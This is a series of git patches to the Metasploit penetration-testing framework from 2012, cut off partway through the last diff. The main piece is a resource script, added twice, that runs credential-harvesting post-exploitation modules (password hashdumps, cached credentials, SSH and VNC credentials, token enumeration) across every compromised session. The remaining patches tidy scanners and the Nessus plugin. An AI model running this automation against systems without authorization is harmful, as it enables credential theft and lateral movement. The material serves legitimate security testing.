From 8825f873251f2576cf7f0904e0d6994bcd797f72 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 6 Feb 2012 08:50:32 +0100 Subject: [PATCH 01/15] multi_post resource file - initial commit --- scripts/resource/multi-post-rc-internal.rc | 119 +++++++++++++++++++++ 1 file changed, 119 insertions(+) create mode 100644 scripts/resource/multi-post-rc-internal.rc diff --git a/scripts/resource/multi-post-rc-internal.rc b/scripts/resource/multi-post-rc-internal.rc new file mode 100644 index 0000000000..cb93a4c6bf --- /dev/null +++ b/scripts/resource/multi-post-rc-internal.rc @@ -0,0 +1,119 @@ +# multi_post.rc +# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de) + +# This Metasploit RC-File could be used to automate the post-exploitation process +# VERBOSE is used from the global datastore +# check out the meterpreter_commands and the modules_win and modules_lin and modules_multi +# you could add your own post exploitation modules into them + + +if (framework.datastore['VERBOSE'] == "true") #we look in the global datastore for a global VERBOSE option and use it + verbose = 1 #true +else + verbose = 0 +end + +meterpreter_commands = [ + 'sysinfo', + 'getuid', + 'getpid', + 'ps', + 'ipconfig' +] + +modules_win = [ + 'post/windows/gather/hashdump', + 'post/windows/gather/cachedump', + 'post/windows/gather/smart_hashdump', + 'post/windows/gather/enum_tokens', + 'post/windows/gather/enum_domain', + 'post/windows/gather/enum_domain_group_users', + 'post/windows/gather/enum_domain_tokens', + 'post/windows/gather/enum_hostfile', + 'post/windows/gather/enum_ie', + 'post/windows/gather/enum_logged_on_users', + 'post/windows/gather/enum_ms_product_keys', + 'post/windows/gather/credentials/vnc', + 'post/windows/gather/credentials/windows_autologin', + 'post/windows/gather/checkvm', + 'post/windows/gather/enum_applications', + 'post/windows/gather/enum_services', + 'post/windows/gather/enum_shares', + 'post/windows/gather/enum_snmp', + 'post/windows/gather/enum_devices', + 'post/windows/gather/enum_powershell_env' +] # add some more modules or comment some out ... +modules_lin = [ + 'post/linux/gather/hashdump', + 'post/osx/gather/hashdump', + 'post/linux/gather/checkvm', + 'post/linux/gather/enum_cron', + 'post/linux/gather/enum_linux', + 'post/linux/gather/enum_packages', + 'post/linux/gather/enum_services', + 'post/osx/gather/enum_osx' +] +modules_multi = [ + 'post/multi/gather/env', + 'post/multi/gather/ssh_creds' +] + +if (framework.sessions.length > 0) # lets start if we have a session + print_status("starting with post exploitation stuff") + framework.sessions.each_key do |sid| + session = framework.sessions[sid] + #meterpreter commands against every meterpreter session + if(session.type == "meterpreter") + print_line("starting meterpreter commands on session number #{sid}") + meterpreter_commands.each { |command| + print_line("running meterpreter command #{command}") + session.console.run_single("#{command.to_s}") + print_line + } + end + end + + print_status("starting the post exploitation with post exploitation modules") + + # lets start with post exploitation modules + framework.sessions.each_key do |sid| + session = framework.sessions[sid] + ips = session.tunnel_peer.split(":") + print_status("Session ID: #{sid.to_i} - IP: #{ips[0]}") + + modules_multi.each { |modul| # multi -> all sessions + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + if(session.platform =~ /win/) # windows sessions + modules_win.each { |modul| + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + else # all other sessions -> typical some linux or unix based systems + modules_lin.each { |modul| + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + end + end +else + print_error("no sessions available") +end +run_single("back") + \ No newline at end of file From 91820ad1c3102407f5271f82e459d90261ddc114 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 6 Feb 2012 08:56:35 +0100 Subject: [PATCH 02/15] logging to notes --- modules/auxiliary/scanner/discovery/ipv6_neighbor.rb | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index d6210c7524..9eed27dded 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -132,6 +132,14 @@ class Metasploit3 < Msf::Auxiliary next if not addr print_status(sprintf(" %16s maps to %s",addr[:ipv4], addr[:ipv6])) + report_note( + :host => addr[:ipv4], + :proto => 'IP', + :sname => 'all', + :type => 'IPv4 to IPv6 mapping', + :data => "system with IPv4 address #{addr[:ipv4]} matches to IPv6 address #{addr[:ipv6]}" + ) # with this we have the results in our database + end end From 74c20464402c5b78e2e8afcee3d06d47be86b6be Mon Sep 17 00:00:00 2001 From: Carlos Perez Date: Mon, 6 Feb 2012 21:48:05 -0400 Subject: [PATCH 03/15] Fix several of the prints for tables, change Constant variables to instace variables so they are removed when plugin is unloaded, removed several if statements for variables no longer set by user input and commented out the generation of the exploit index since it is not used at this moment --- plugins/nessus.rb | 150 ++++++++++++++++++++++------------------------ 1 file changed, 70 insertions(+), 80 deletions(-) diff --git a/plugins/nessus.rb b/plugins/nessus.rb index a244d30140..9836aa159b 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -5,20 +5,15 @@ require 'nessus/nessus-xmlrpc' require 'rex/parser/nessus_xml' module Msf - #constants - NBVer = "1.1" # Nessus Plugin Version. Increments each time we commit to msf - Xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits. - Nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds - class Plugin::Nessus < Msf::Plugin #creates the index of exploit details to make searching for exploits much faster. def create_xindex start = Time.now - print_status("Creating Exploit Search Index - (#{Xindex}) - this wont take long.") + print_status("Creating Exploit Search Index - (#{@xindex}) - this wont take long.") count = 0 # use Msf::Config.get_config_root as the location. - File.open("#{Xindex}", "w+") do |f| + File.open("#{@xindex}", "w+") do |f| #need to add version line. f.puts(Msf::Framework::RepoRevision) framework.exploits.sort.each { |refname, mod| @@ -48,13 +43,13 @@ module Msf end def nessus_index - if File.exist?("#{Xindex}") + if File.exist?("#{@xindex}") #check if it's version line matches current version. - File.open("#{Xindex}") {|f| + File.open("#{@xindex}") {|f| line = f.readline line.chomp! if line.to_i == Msf::Framework::RepoRevision - print_good("Exploit Index - (#{Xindex}) - is valid.") + print_good("Exploit Index - (#{@xindex}) - is valid.") else create_xindex end @@ -73,42 +68,41 @@ module Msf def commands { - "nessus_connect" => "Connect to a nessus server: nconnect username:password@hostname:port ", - "nessus_admin" => "Checks if user is an admin", - "nessus_help" => "Get help on all commands", - "nessus_logout" => "Terminate the session", - "nessus_server_status" => "Check the status of your Nessus Server", - "nessus_server_feed" => "Nessus Feed Type", - "nessus_server_prefs" => "Display Server Prefs", - "nessus_report_list" => "List all Nessus reports", - "nessus_report_get" => "Import a report from the nessus server in Nessus v2 format", - "nessus_report_del" => "Delete a report", - "nessus_report_hosts" => "Get list of hosts from a report", - "nessus_report_host_ports" => "Get list of open ports from a host from a report", - "nessus_report_host_detail" => "Detail from a report item on a host", - "nessus_scan_status" => "List all currently running Nessus scans", - "nessus_scan_new" => "Create new Nessus Scan", - "nessus_scan_pause" => "Pause a Nessus Scan", - "nessus_scan_pause_all" => "Pause all Nessus Scans", - "nessus_scan_stop" => "Stop a Nessus Scan", - "nessus_scan_stop_all" => "Stop all Nessus Scans", - "nessus_scan_resume" => "Resume a Nessus Scan", - "nessus_scan_resume_all" => "Resume all Nessus Scans", - "nessus_user_list" => "Show Nessus Users", - "nessus_user_add" => "Add a new Nessus User", - "nessus_user_del" => "Delete a Nessus User", - "nessus_user_passwd" => "Change Nessus Users Password", - "nessus_plugin_family" => "List plugins in a family", - "nessus_plugin_details" => "List details of a particular plugin", - "nessus_plugin_list" => "Displays each plugin family and the number of plugins", - "nessus_plugin_prefs" => "Display Plugin Prefs", - "nessus_policy_list" => "List all polciies", - "nessus_policy_del" => "Delete a policy", + "nessus_connect" => "Connect to a nessus server: nconnect username:password@hostname:port .", + "nessus_admin" => "Checks if user is an admin.", + "nessus_help" => "Get help on all commands.", + "nessus_logout" => "Terminate the session.", + "nessus_server_status" => "Check the status of your Nessus Server.", + "nessus_server_feed" => "Nessus Feed Type.", + "nessus_server_prefs" => "Display Server Prefs.", + "nessus_report_list" => "List all Nessus reports.", + "nessus_report_get" => "Import a report from the nessus server in Nessus v2 format.", + "nessus_report_del" => "Delete a report.", + "nessus_report_hosts" => "Get list of hosts from a report.", + "nessus_report_host_ports" => "Get list of open ports from a host from a report.", + "nessus_report_host_detail" => "Detail from a report item on a host.", + "nessus_scan_status" => "List all currently running Nessus scans.", + "nessus_scan_new" => "Create new Nessus Scan.", + "nessus_scan_pause" => "Pause a Nessus Scan.", + "nessus_scan_pause_all" => "Pause all Nessus Scans.", + "nessus_scan_stop" => "Stop a Nessus Scan.", + "nessus_scan_stop_all" => "Stop all Nessus Scans.", + "nessus_scan_resume" => "Resume a Nessus Scan.", + "nessus_scan_resume_all" => "Resume all Nessus Scans.", + "nessus_user_list" => "Show Nessus Users.", + "nessus_user_add" => "Add a new Nessus User.", + "nessus_user_del" => "Delete a Nessus User.", + "nessus_user_passwd" => "Change Nessus Users Password.", + "nessus_plugin_family" => "List plugins in a family.", + "nessus_plugin_details" => "List details of a particular plugin.", + "nessus_plugin_list" => "Displays each plugin family and the number of plugins.", + "nessus_plugin_prefs" => "Display Plugin Prefs.", + "nessus_policy_list" => "List all polciies.", + "nessus_policy_del" => "Delete a policy.", "nessus_index" => "Manually generates a search index for exploits.", - "nessus_template_list" => "List all the templates on the server", - "nessus_db_scan" => "Create a scan of all ips in db_hosts", - "nessus_save" => "Save username/passowrd/server/port details", - "nessus_report_exploits" => "Shows a summary of all the vulns in a scan that have a msf exploit." + "nessus_template_list" => "List all the templates on the server.", + "nessus_db_scan" => "Create a scan of all ips in db_hosts.", + "nessus_save" => "Save username/passowrd/server/port details." } end @@ -135,10 +129,10 @@ module Msf if ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) config = Hash.new config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port}} - File.open("#{Nessus_yaml}", "w+") do |f| + File.open("#{@nessus_yaml}", "w+") do |f| f.puts YAML.dump(config) end - print_good("#{Nessus_yaml} created.") + print_good("#{@nessus_yaml} created.") else print_error("Missing username/password/server/port - relogin and then try again.") @@ -198,8 +192,8 @@ module Msf def cmd_nessus_logout @token = nil print_status("Logged out") - system("rm #{Nessus_yaml}") - print_good("#{Nessus_yaml} removed.") + system("rm #{@nessus_yaml}") + print_good("#{@nessus_yaml} removed.") return end @@ -259,7 +253,7 @@ module Msf tbl << [ "nessus_policy_list", "List all polciies" ] tbl << [ "nessus_policy_del", "Delete a policy" ] print_status "" - print_status tbl.to_s + print_line tbl.to_s print_status "" end @@ -285,7 +279,7 @@ module Msf tbl << [@feed, @version, @web_version] print_good("Nessus Status") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end end @@ -327,8 +321,8 @@ module Msf def cmd_nessus_connect(*args) if ! args[0] - if File.exist?("#{Nessus_yaml}") - lconfig = YAML.load_file("#{Nessus_yaml}") + if File.exist?("#{@nessus_yaml}") + lconfig = YAML.load_file("#{@nessus_yaml}") @user = lconfig['default']['username'] @pass = lconfig['default']['password'] @host = lconfig['default']['server'] @@ -483,7 +477,7 @@ module Msf } print_good("Nessus Report List") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s + "\n" print_status("You can:") print_status(" Get a list of hosts from the report: nessus_report_hosts ") end @@ -609,7 +603,7 @@ module Msf } print_good("Running Scans") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s print_good "\n" print_status("You can:") print_good(" Import Nessus report to database : nessus_report_get ") @@ -655,7 +649,7 @@ module Msf } print_good("Templates") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s + "\n" print_good "\n" print_status("You can:") print_good(" Import Nessus report to database : nessus_report_get ") @@ -695,7 +689,7 @@ module Msf } print_good("Nessus users") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_server_status(*args) @@ -755,7 +749,7 @@ module Msf plugins = total.sum tbl << [users, policies, scans, reports, plugins] print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_plugin_list(*args) @@ -789,7 +783,7 @@ module Msf tbl << [ 'Total Plugins', plugins ] print_good("Plugins By Family") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s print_status("List plugins for a family : nessus_plugin_family ") end @@ -959,7 +953,7 @@ module Msf } print_good("Report Info") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s print_status("You can:") print_status(" Get information from a particular host: nessus_report_host_ports ") end @@ -1007,7 +1001,7 @@ module Msf } print_good("Host Info") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s print_status("You can:") print_status(" Get detailed scan infromation about a specfic port: nessus_report_host_detail ") end @@ -1069,7 +1063,7 @@ module Msf } print_good("Port Info") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_scan_pause_all(*args) @@ -1358,7 +1352,7 @@ module Msf } print_good("#{fam} Info") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_policy_list(*args) @@ -1388,7 +1382,7 @@ module Msf } print_good("Nessus Policy List") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_policy_del(*args) @@ -1422,7 +1416,7 @@ module Msf return end - if answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes" + del = @n.policy_del(pid) status = del.root.elements['status'].text if status == "OK" @@ -1430,10 +1424,8 @@ module Msf else print_error("Policy number #{pid} was not deleted") end - else - print_error("wow that was close, damn we asked") + end - end def cmd_nessus_plugin_details(*args) @@ -1484,7 +1476,7 @@ module Msf tbl << [ "Plugin Pub Date", entry['plugin_publication_date'] ] tbl << [ "Plugin Modification Date", entry['plugin_modification_date'] ] print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end def cmd_nessus_report_del(*args) @@ -1518,7 +1510,7 @@ module Msf return end - if (answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes") + del = @n.report_del(rid) status = del.root.elements['status'].text if status == "OK" @@ -1526,13 +1518,8 @@ module Msf else print_error("Report #{rid} was not deleted") end - else - print_error("wow that was close, damn we asked") end - - end - def cmd_nessus_server_prefs(*args) if args[0] == "-h" @@ -1564,7 +1551,7 @@ module Msf } print_good("Nessus Server Pref List") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s + "\n" end @@ -1600,7 +1587,7 @@ module Msf } print_good("Nessus Plugins Pref List") print_good "\n" - print_good tbl.to_s + "\n" + print_line tbl.to_s end end @@ -1608,9 +1595,12 @@ module Msf super add_console_dispatcher(ConsoleCommandDispatcher) - print_status("Nessus Bridge for Metasploit #{NBVer}") + @nbver = "1.1" # Nessus Plugin Version. Increments each time we commit to msf + @xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits. + @nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds + print_status("Nessus Bridge for Metasploit #{@nbver}") print_good("Type %bldnessus_help%clr for a command listing") - nessus_index + #nessus_index end def cleanup @@ -1622,7 +1612,7 @@ module Msf end def desc - "Nessus Bridge for Metasploit #{NBVer}" + "Nessus Bridge for Metasploit #{@nbver}" end protected end From 2c762d7f7e254e78ce67e84514a585d1187deaba Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Tue, 7 Feb 2012 08:40:35 +0100 Subject: [PATCH 04/15] renamed multi post resource file --- scripts/resource/multi_post.rc | 119 +++++++++++++++++++++++++++++++++ 1 file changed, 119 insertions(+) create mode 100644 scripts/resource/multi_post.rc diff --git a/scripts/resource/multi_post.rc b/scripts/resource/multi_post.rc new file mode 100644 index 0000000000..cb93a4c6bf --- /dev/null +++ b/scripts/resource/multi_post.rc @@ -0,0 +1,119 @@ +# multi_post.rc +# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de) + +# This Metasploit RC-File could be used to automate the post-exploitation process +# VERBOSE is used from the global datastore +# check out the meterpreter_commands and the modules_win and modules_lin and modules_multi +# you could add your own post exploitation modules into them + + +if (framework.datastore['VERBOSE'] == "true") #we look in the global datastore for a global VERBOSE option and use it + verbose = 1 #true +else + verbose = 0 +end + +meterpreter_commands = [ + 'sysinfo', + 'getuid', + 'getpid', + 'ps', + 'ipconfig' +] + +modules_win = [ + 'post/windows/gather/hashdump', + 'post/windows/gather/cachedump', + 'post/windows/gather/smart_hashdump', + 'post/windows/gather/enum_tokens', + 'post/windows/gather/enum_domain', + 'post/windows/gather/enum_domain_group_users', + 'post/windows/gather/enum_domain_tokens', + 'post/windows/gather/enum_hostfile', + 'post/windows/gather/enum_ie', + 'post/windows/gather/enum_logged_on_users', + 'post/windows/gather/enum_ms_product_keys', + 'post/windows/gather/credentials/vnc', + 'post/windows/gather/credentials/windows_autologin', + 'post/windows/gather/checkvm', + 'post/windows/gather/enum_applications', + 'post/windows/gather/enum_services', + 'post/windows/gather/enum_shares', + 'post/windows/gather/enum_snmp', + 'post/windows/gather/enum_devices', + 'post/windows/gather/enum_powershell_env' +] # add some more modules or comment some out ... +modules_lin = [ + 'post/linux/gather/hashdump', + 'post/osx/gather/hashdump', + 'post/linux/gather/checkvm', + 'post/linux/gather/enum_cron', + 'post/linux/gather/enum_linux', + 'post/linux/gather/enum_packages', + 'post/linux/gather/enum_services', + 'post/osx/gather/enum_osx' +] +modules_multi = [ + 'post/multi/gather/env', + 'post/multi/gather/ssh_creds' +] + +if (framework.sessions.length > 0) # lets start if we have a session + print_status("starting with post exploitation stuff") + framework.sessions.each_key do |sid| + session = framework.sessions[sid] + #meterpreter commands against every meterpreter session + if(session.type == "meterpreter") + print_line("starting meterpreter commands on session number #{sid}") + meterpreter_commands.each { |command| + print_line("running meterpreter command #{command}") + session.console.run_single("#{command.to_s}") + print_line + } + end + end + + print_status("starting the post exploitation with post exploitation modules") + + # lets start with post exploitation modules + framework.sessions.each_key do |sid| + session = framework.sessions[sid] + ips = session.tunnel_peer.split(":") + print_status("Session ID: #{sid.to_i} - IP: #{ips[0]}") + + modules_multi.each { |modul| # multi -> all sessions + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + if(session.platform =~ /win/) # windows sessions + modules_win.each { |modul| + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + else # all other sessions -> typical some linux or unix based systems + modules_lin.each { |modul| + run_single("use #{modul}") + run_single("set SESSION #{sid}") + if (verbose == 1) + run_single("run -j") + else + run_single("run -j -q") + end + } + end + end +else + print_error("no sessions available") +end +run_single("back") + \ No newline at end of file From 705c436ede86b09b6b63c9aeac3ac00e27afe2d2 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Tue, 7 Feb 2012 11:45:20 +0100 Subject: [PATCH 05/15] added more multicast addresses from wikipedia --- .../scanner/discovery/ipv6_multicast_ping.rb | 27 ++++++++++++------- 1 file changed, 18 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index 2abba0700e..c543662412 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -1,5 +1,5 @@ ## -# $Id$ +# $Id: ipv6_multicast_ping.rb 13962 2011-10-17 02:42:01Z todb $ ## require 'msf/core' @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IPv6 Link Local/Node Local Ping Discovery', - 'Version' => '$Revision$', + 'Version' => '$Revision: 13962 $', 'Description' => %q{ Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds. }, @@ -65,15 +65,24 @@ class Metasploit3 < Msf::Auxiliary # Send ping print_status("Sending multicast pings...") dmac = "33:33:00:00:00:01" - + # Figure out our source address by the link-local interface shost = ipv6_link_address - - ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) - ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) - ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) - ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) - + + # m-1-k-3: added some more multicast addresses from wikipedia: https://en.wikipedia.org/wiki/Multicast_address#IPv6 + ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all nodes + ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all routers + ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All nodes on the local network segment + ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All routers on the local network segment + ping6("FF02::5", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllSPF routers + ping6("FF02::6", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllDR routers + ping6("FF02::9", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #RIP routers + ping6("FF02::a", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #EIGRP routers + ping6("FF02::d", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #PIM routers + ping6("FF02::16", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #MLDv2 reports (defined in RFC 3810) + ping6("ff02::1:2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers and relay agents on the local network site (defined in RFC 3315) + ping6("ff05::1:3", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers on the local network site (defined in RFC 3315) + # Listen for host advertisments print_status("Listening for responses...") listen_for_ping_response() From 29b99aa7b44206209c8bb2d8ba7b3c0ce37be240 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 8 Feb 2012 12:23:46 -0600 Subject: [PATCH 06/15] Fix up titles/add boundary check for reporting external host --- modules/auxiliary/admin/natpmp/natpmp_map.rb | 22 +++++++++------- .../gather/natpmp_external_address.rb | 26 ++++++++++--------- .../scanner/natpmp/natpmp_portscan.rb | 26 ++++++++++--------- 3 files changed, 40 insertions(+), 34 deletions(-) diff --git a/modules/auxiliary/admin/natpmp/natpmp_map.rb b/modules/auxiliary/admin/natpmp/natpmp_map.rb index f4c029ef4f..a544fa5880 100644 --- a/modules/auxiliary/admin/natpmp/natpmp_map.rb +++ b/modules/auxiliary/admin/natpmp/natpmp_map.rb @@ -8,7 +8,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'NAT-PMP port mapper', + 'Name' => 'NAT-PMP Port Mapper', 'Description' => 'Map (forward) TCP and UDP ports on NAT devices using NAT-PMP', 'Author' => 'Jon Hart ', 'License' => MSF_LICENSE @@ -30,9 +30,9 @@ class Metasploit3 < Msf::Auxiliary def run_host(host) begin - udp_sock = Rex::Socket::Udp.create( - { 'LocalHost' => datastore['CHOST'] || nil, - 'Context' => {'Msf' => framework, 'MsfExploit' => self} + udp_sock = Rex::Socket::Udp.create({ + 'LocalHost' => datastore['CHOST'] || nil, + 'Context' => {'Msf' => framework, 'MsfExploit' => self} }) add_socket(udp_sock) @@ -96,11 +96,13 @@ class Metasploit3 < Msf::Auxiliary ) # report the external port as being open - report_service( - :host => external_address, - :port => external_port, - :proto => datastore['PROTOCOL'].to_s.downcase, - :state => Msf::ServiceState::Open - ) + if inside_workspace_boundary(external_address) + report_service( + :host => external_address, + :port => external_port, + :proto => datastore['PROTOCOL'].to_s.downcase, + :state => Msf::ServiceState::Open + ) + end end end diff --git a/modules/auxiliary/gather/natpmp_external_address.rb b/modules/auxiliary/gather/natpmp_external_address.rb index eb51cec408..cd609022c6 100644 --- a/modules/auxiliary/gather/natpmp_external_address.rb +++ b/modules/auxiliary/gather/natpmp_external_address.rb @@ -8,7 +8,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'NAT-PMP External address scanner', + 'Name' => 'NAT-PMP External Address Scanner', 'Description' => 'Scan NAT devices for their external address using NAT-PMP', 'Author' => 'Jon Hart ', 'License' => MSF_LICENSE @@ -25,15 +25,15 @@ class Metasploit3 < Msf::Auxiliary def run_host(host) begin - udp_sock = Rex::Socket::Udp.create( - { 'LocalHost' => datastore['CHOST'] || nil, - 'Context' => {'Msf' => framework, 'MsfExploit' => self} + udp_sock = Rex::Socket::Udp.create({ + 'LocalHost' => datastore['CHOST'] || nil, + 'Context' => {'Msf' => framework, 'MsfExploit' => self} }) add_socket(udp_sock) print_status "#{host}:#{datastore['RPORT']} - NATPMP - Probing for external address" if (datastore['VERBOSE']) udp_sock.sendto(Rex::Proto::NATPMP.external_address_request, host, datastore['RPORT'].to_i, 0) - while (r = udp_sock.recvfrom(12, 0.25) and r[1]) + while (r = udp_sock.recvfrom(12, 1.0) and r[1]) handle_reply(host, r) end rescue ::Interrupt @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused nil rescue ::Exception => e - print_error("Unknown error: #{e.class} #{e}") + print_error("#{host}:#{datastore['RPORT']} Unknown error: #{e.class} #{e}") end end @@ -65,18 +65,20 @@ class Metasploit3 < Msf::Auxiliary ) # also report its external address as alive - report_host( - :host => external_address, - :state => Msf::HostState::Alive - ) + if inside_workspace_boundary(external_address) + report_host( + :host => external_address, + :state => Msf::HostState::Alive + ) + end # report NAT-PMP as being open report_service( :host => host, :port => pkt[2], :proto => 'udp', - :name => 'natpmp', - :state => Msf::ServiceState::Open + :name => 'natpmp', + :state => Msf::ServiceState::Open ) end end diff --git a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb index c47e13fbec..5b6edd1543 100644 --- a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb +++ b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb @@ -10,7 +10,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'NAT-PMP External port scanner', + 'Name' => 'NAT-PMP External Port Scanner', 'Description' => 'Scan NAT devices for their external listening ports using NAT-PMP', 'Author' => 'Jon Hart ', 'License' => MSF_LICENSE @@ -27,9 +27,9 @@ class Metasploit3 < Msf::Auxiliary def run_host(host) begin - udp_sock = Rex::Socket::Udp.create( - { 'LocalHost' => datastore['CHOST'] || nil, - 'Context' => {'Msf' => framework, 'MsfExploit' => self} } + udp_sock = Rex::Socket::Udp.create({ + 'LocalHost' => datastore['CHOST'] || nil, + 'Context' => {'Msf' => framework, 'MsfExploit' => self} } ) add_socket(udp_sock) print_status "Scanning #{datastore['PROTOCOL']} ports #{datastore['PORTS']} on #{host} using NATPMP" if (datastore['VERBOSE']) @@ -52,13 +52,13 @@ class Metasploit3 < Msf::Auxiliary # send one request to clear the mapping if *we've* created it before clear_req = Rex::Proto::NATPMP.map_port_request(port, port, Rex::Proto::NATPMP.const_get(datastore['PROTOCOL']), 0) udp_sock.sendto(clear_req, host, datastore['RPORT'].to_i, 0) - while (r = udp_sock.recvfrom(16, 0.25) and r[1]) + while (r = udp_sock.recvfrom(16, 1.0) and r[1]) end # now try the real mapping map_req = Rex::Proto::NATPMP.map_port_request(port, port, Rex::Proto::NATPMP.const_get(datastore['PROTOCOL']), 1) udp_sock.sendto(map_req, host, datastore['RPORT'].to_i, 0) - while (r = udp_sock.recvfrom(16, 0.25) and r[1]) + while (r = udp_sock.recvfrom(16, 1.0) and r[1]) handle_reply(host, external_address, r) end end @@ -98,12 +98,14 @@ class Metasploit3 < Msf::Auxiliary print_status("#{external_addr} - #{int}/#{protocol} #{state} because of code #{result} response") if (datastore['DEBUG']) end - report_service( - :host => external_addr, - :port => int, - :proto => protocol, - :state => state - ) + if inside_workspace_boundary(external_addr) + report_service( + :host => external_addr, + :port => int, + :proto => protocol, + :state => state + ) + end report_service( :host => host, From 3d1c8ae3830a4964138a4d2373ec50a8e59f6b9a Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 6 Feb 2012 17:46:42 -0700 Subject: [PATCH 07/15] Fix another errant use of dprintf --- .../meterpreter/source/extensions/networkpug/networkpug.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/external/source/meterpreter/source/extensions/networkpug/networkpug.c b/external/source/meterpreter/source/extensions/networkpug/networkpug.c index f830f94146..d7277aa5bc 100644 --- a/external/source/meterpreter/source/extensions/networkpug/networkpug.c +++ b/external/source/meterpreter/source/extensions/networkpug/networkpug.c @@ -178,7 +178,7 @@ void free_networkpug(NetworkPug *np, int close_channel, int destroy_channel) cont = __atomic_swap(0, &np->active); if(! cont) { - dprintf("Seems the pug at %p was already set free"); + dprintf("Seems the pug at %p was already set free", &np); return; } From 1f1e67cb16d579f04c16caca85307102d122eb1d Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Thu, 9 Feb 2012 04:56:13 +0000 Subject: [PATCH 08/15] Moved railgun function definitions into central storage and out of individual modules where possible --- .../stdapi/railgun/def/def_netapi32.rb | 11 +++++ .../stdapi/railgun/def/def_ws2_32.rb | 6 +++ .../windows/escalate/net_runtime_modify.rb | 14 ++----- .../windows/escalate/service_permissions.rb | 7 +--- 